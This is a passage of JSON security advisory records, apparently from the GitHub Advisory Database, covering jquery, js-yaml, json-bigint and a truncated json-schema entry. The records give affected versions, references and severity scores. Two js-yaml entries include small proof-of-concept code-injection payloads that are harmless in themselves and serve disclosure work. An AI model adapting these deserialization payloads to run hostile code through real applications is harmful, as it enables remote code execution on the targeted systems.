"https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c@%3Ccommits.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c%40%3Ccommits.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/162160/jQuery-1.0.3-Cross-Site-Scripting.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-04-29T21:04:50Z", "nvd_published_at": "2020-04-29T21:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N/E:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mhpp-875w-9cpv", "published": "2018-01-22T13:32:42Z", "modified": "2025-09-02T22:35:01Z", "aliases": [ "CVE-2016-10707" ], "summary": "Denial of Service in jquery", "details": "Affected versions of `jquery` use a lowercasing logic on attribute names. When given a boolean attribute with a name that contains uppercase characters, `jquery` enters into an infinite recursion loop, exceeding the call stack limit, and resulting in a denial of service condition.\n\n\n## Recommendation\n\nUpdate to version 3.0.0 or later.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0-rc.1" }, { "fixed": "3.0.0" } ] } ], "versions": [ "3.0.0-rc.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-mhpp-875w-9cpv/GHSA-mhpp-875w-9cpv.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-rc.1" }, { "fixed": "3.0.0" } ] } ], "versions": [ "3.0.0-rc.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-mhpp-875w-9cpv/GHSA-mhpp-875w-9cpv.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-rc1" }, { "fixed": "3.0.0" } ] } ], "versions": [ "3.0.0-rc1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-mhpp-875w-9cpv/GHSA-mhpp-875w-9cpv.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-rc.1" }, { "fixed": "3.0.0" } ] } ], "versions": [ "3.0.0-rc.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-mhpp-875w-9cpv/GHSA-mhpp-875w-9cpv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10707" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/issues/3133" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/issues/3133#issuecomment-358978489" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/pull/3134" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mhpp-875w-9cpv" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2016-10707.yml" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:jquery:20160529" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/330" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:46:22Z", "nvd_published_at": "2018-01-18T23:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q4m3-2j7h-f7xw", "published": "2020-05-20T16:18:01Z", "modified": "2025-01-14T08:57:21.902958Z", "aliases": [ "CVE-2020-7656" ], "summary": "Cross-Site Scripting in jquery", "details": "Versions of `jquery` prior to 1.9.0 are vulnerable to Cross-Site Scripting. The load method fails to recognize and remove `\u003cscript\u003e` HTML tags that contain a whitespace character, i.e: `\u003c/script \u003e`, which results in the enclosed script logic to be executed. This allows attackers to execute arbitrary JavaScript in a victim's browser.\n\n\n## Recommendation\n\nUpgrade to version 1.9.0 or later.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.2.1" }, { "fixed": "1.9.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q4m3-2j7h-f7xw/GHSA-q4m3-2j7h-f7xw.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.2.1" }, { "fixed": "1.9.0" } ] } ], "versions": [ "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q4m3-2j7h-f7xw/GHSA-q4m3-2j7h-f7xw.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.2.0" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q4m3-2j7h-f7xw/GHSA-q4m3-2j7h-f7xw.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.2.1" }, { "fixed": "1.9.0" } ] } ], "versions": [ "1.7.2", "1.7.3", "1.8.2", "1.8.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q4m3-2j7h-f7xw/GHSA-q4m3-2j7h-f7xw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7656" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/05531fc4080ae24070930d15ae0cea7ae056457d" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/606b863edaff29035960e4d813b45d63b8d92876" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/blob/9e6393b0bcb52b15313f88141d0bd7dd54227426/src/ajax.js#L203" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#220-19-january-2013" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v2.1.4/vendor/assets/javascripts/jquery.js#L7481" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-7656.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200528-0001" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-JQUERY-569619" }, { "type": "WEB", "url": "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1?language=en_US" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-05-20T16:17:45Z", "nvd_published_at": "2020-05-19T21:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rmxg-73gg-4p98", "published": "2018-01-22T13:32:06Z", "modified": "2024-03-10T05:18:22.438189Z", "aliases": [ "CVE-2015-9251" ], "summary": "Cross-Site Scripting (XSS) in jquery", "details": "Affected versions of `jquery` interpret `text/javascript` responses from cross-origin ajax requests, and automatically execute the contents in `jQuery.globalEval`, even when the ajax request doesn't contain the `dataType` option.\n\n\n## Recommendation\n\nUpdate to version 3.0.0 or later.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.12.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.12.2" } ] } ], "versions": [ "1.10.0", "1.10.0.1", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.12.3" }, { "fixed": "3.0.0" } ] } ], "versions": [ "1.12.3", "1.12.4", "2.0.0", "2.0.1", "2.0.1.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.12.3" }, { "fixed": "3.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.2.0" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.3.0", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5", "4.0.0", "4.0.0.beta1", "4.0.0.beta2", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.1.0", "4.1.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.12.2" } ] } ], "versions": [ "1.11.0", "1.11.1", "1.11.3", "1.12.1", "1.7.2", "1.7.3", "1.8.2", "1.8.3", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.12.3" }, { "fixed": "3.0.0" } ] } ], "versions": [ "1.12.3", "1.12.4", "2.1.0", "2.1.1", "2.1.1-rc1", "2.1.1-rc2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0-alpha1", "3.0.0-beta1", "3.0.0-rc1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-9251" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/issues/2432" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/issues/2432#issuecomment-403761229" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/pull/2588" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/b078a62013782c7424a4a61a240c23c4c0b42614" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0481" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/18" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210108-0004" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450227" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:jquery:20150627" }, { "type": "WEB", "url": "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030101/http://www.securityfocus.com/bid/105658" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2019-08" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#420" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v4.2.0/vendor/assets/javascripts/jquery3.js#L9377" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/releases/tag/v4.2.0" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2015-9251.yml" }, { "type": "WEB", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04" }, { "type": "WEB", "url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3Ccommits.roller.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/10" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/11" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/13" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:55:10Z", "nvd_published_at": "2018-01-18T23:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2pr6-76vf-7546", "published": "2019-06-05T14:35:29Z", "modified": "2021-08-04T21:32:56Z", "summary": "Denial of Service in js-yaml", "details": "Versions of `js-yaml` prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources leading to a Denial of Service.\n\n\n## Recommendation\n\nUpgrade to version 3.13.0.", "affected": [ { "package": { "name": "js-yaml", "ecosystem": "npm", "purl": "pkg:npm/js-yaml" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.13.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-2pr6-76vf-7546/GHSA-2pr6-76vf-7546.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodeca/js-yaml/issues/475" }, { "type": "WEB", "url": "https://github.com/nodeca/js-yaml/commit/a567ef3c6e61eb319f0bfc2671d91061afb01235" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-JSYAML-173999" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/788" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/788/versions" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-05T13:52:07Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8j8c-7jfh-h6hx", "published": "2019-06-04T20:14:07Z", "modified": "2020-08-31T18:36:43Z", "summary": "Code Injection in js-yaml", "details": "Versions of `js-yaml` prior to 3.13.1 are vulnerable to Code Injection. The `load()` function may execute arbitrary code injected through a malicious YAML file. Objects that have `toString` as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the `load()` function. The `safeLoad()` function is unaffected.\n\nAn example payload is \n`{ toString: !\u003ctag:yaml.org,2002:js/function\u003e 'function (){return Date.now()}' } : 1` \nwhich returns the object \n{\n \"1553107949161\": 1\n}\n\n\n## Recommendation\n\nUpgrade to version 3.13.1.", "affected": [ { "package": { "name": "js-yaml", "ecosystem": "npm", "purl": "pkg:npm/js-yaml" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.13.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-8j8c-7jfh-h6hx/GHSA-8j8c-7jfh-h6hx.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodeca/js-yaml/pull/480" }, { "type": "WEB", "url": "https://github.com/nodeca/js-yaml/pull/480/commits/e18afbf1edcafb7add2c4c7b22abc8d6ebc2fa61" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/813" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2019-06-04T20:13:53Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-xxvw-45rp-3mj2", "published": "2017-10-24T18:33:37Z", "modified": "2023-11-08T03:57:24.142876Z", "aliases": [ "CVE-2013-4660" ], "summary": "Deserialization Code Execution in js-yaml", "details": "Versions 2.0.4 and earlier of `js-yaml` are affected by a code execution vulnerability in the YAML deserializer.\n\n## Proof of Concept\n```\nconst yaml = require('js-yaml');\n\nconst x = `test: !!js/function \u003e\nfunction f() { \nconsole.log(1); \n}();`\n\nyaml.load(x);\n```\n\n\n## Recommendation\n\nUpdate js-yaml to version 2.0.5 or later, and ensure that all instances where the `.load()` method is called are updated to use `.safeLoad()` instead.", "affected": [ { "package": { "name": "js-yaml", "ecosystem": "npm", "purl": "pkg:npm/js-yaml" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.0.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-xxvw-45rp-3mj2/GHSA-xxvw-45rp-3mj2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4660" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-xxvw-45rp-3mj2" }, { "type": "WEB", "url": "https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/16" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:05:02Z", "nvd_published_at": null, "severity": "CRITICAL" } }, { "schema_version": "1.7.3", "id": "GHSA-wgfq-7857-4jcc", "published": "2021-05-07T16:47:19Z", "modified": "2023-11-08T04:04:15.903445Z", "aliases": [ "CVE-2020-8237" ], "summary": "Uncontrolled Resource Consumption in json-bigint", "details": "Prototype pollution in json-bigint npm package \u003c 1.0.0 may lead to a denial-of-service (DoS) attack.", "affected": [ { "package": { "name": "json-bigint", "ecosystem": "npm", "purl": "pkg:npm/json-bigint" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-wgfq-7857-4jcc/GHSA-wgfq-7857-4jcc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8237" }, { "type": "WEB", "url": "https://hackerone.com/reports/916430" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-04-28T16:57:11Z", "nvd_published_at": "2020-09-18T21:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-896r-f27r-55mw", "published": "2021-11-19T20:16:17Z", "modified": "2025-01-17T21:31:38Z", "aliases": [ "CVE-2021-3918" ], "summary": "json-schema is vulnerable to Prototype 